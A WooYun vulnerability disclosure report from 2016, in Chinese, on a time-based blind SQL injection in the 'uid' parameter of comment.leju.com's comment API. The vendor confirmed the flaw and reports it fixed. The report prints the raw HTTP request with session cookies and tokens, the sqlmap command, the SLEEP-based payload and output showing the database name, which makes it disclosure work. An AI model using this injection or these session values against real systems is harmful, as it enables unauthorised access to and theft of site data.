乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-23: 细节已通知厂商并且等待厂商处理中 2016-04-24: 厂商已经确认,细节仅向厂商公开 2016-04-25: 厂商已经修复漏洞并主动公开,细节向公众公开
SQL注入
注入参数 uid
GET /api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011* HTTP/1.1Host: comment.leju.comAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Accept-Encoding: gzip, deflate, sdchHost: comment.leju.comAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36Connection: keep-aliveReferer: http://hf.leju.com/news/2016-04-22/08186129070685173370162.shtmlCookie: M_AUTH=bcf97a064686696b03c5be538b6759fe74a9086b; M_USER=eNpdj8GKAjEMhp%2BmXoQl7bRNcuhhdAoWtlWnncOcZGbcZXEfYNGn3ypeFAL%2FT%2FKFP1nF0xA6pxjBoAYpV7WRfZ%2Fa6J3wKFiLloS3gkhs8IU77PbJu2p8bMPn3eQxl1AX4QMkKcUAa6kNEUgGU%2Bchl13oOzfe%2BstYjtd4%2B0lDAR4vv9f4J5qu1gPL%2B6Hfeoeap7mZLdlGWQJr4YxoiSUa%2BUVSPdhNSJ1b9DJp1dAEM1dRcF4WAzzZbzSkeb4fF1L7%2Fmp5Bql%2F1hZEWg%3D%3D; M_KEY=YmNhNzljMjFZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0T0Rnek1EVT0yZGY4; M_INFO=%7B%22uid%22%3A%222970574011%22%2C%22username%22%3A%22%5Cu7528%5Cu62372970574011%22%2C%22isThird%22%3Atrue%2C%22phone%22%3A%22%22%2C%22headurl%22%3A%22http%3A%5C%2F%5C%2Fp4.sinaimg.cn%5C%2F2970574011%5C%2F180%22%2C%22iscard%22%3Afalse%7D; M_UID=2970574011; M_ITSOURCE=749ab3b68632680660d776891751e812; M_SPRING=YzRjYTQyMzhNUT09YjkyMw%3D%3D; M_TICKET=NGU5ZDc4Y2RZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0TURFNU1EVmZNamszTURVM05EQXhNUT09ZWE5Yw%3D%3D; pgv_pvi=1220687872; city=wh; wapparam=wap2web; citypub=wh; extern_host=hf.leju.com; gatheruuid=56f63df72a5ab810
sqlmap -r 1.txt --dbms=mysql --current-db --technique=T
---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://comment.leju.com:80/api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011') AND (SELECT * FROM (SELECT(SLEEP(5)))sslJ) AND ('lITm'='lITm---[22:49:28] [INFO] testing MySQLdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] [22:49:57] [INFO] confirming MySQL[22:49:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [22:50:37] [INFO] adjusting time delay to 4 seconds due to good response times[22:50:37] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.0[22:50:37] [INFO] fetching current database[22:50:37] [INFO] retrieved: comment_leju_comcurrent database: 'comment_leju_com'[23:09:23] [INFO] fetched data logged to text files under '/Users/null0z/.sqlmap/output/comment.leju.com'
~~~
危害等级:高
漏洞Rank:10
确认时间:2016-04-24 13:49
非常感谢您对乐居关注
2016-04-25:漏洞已修复,再次感谢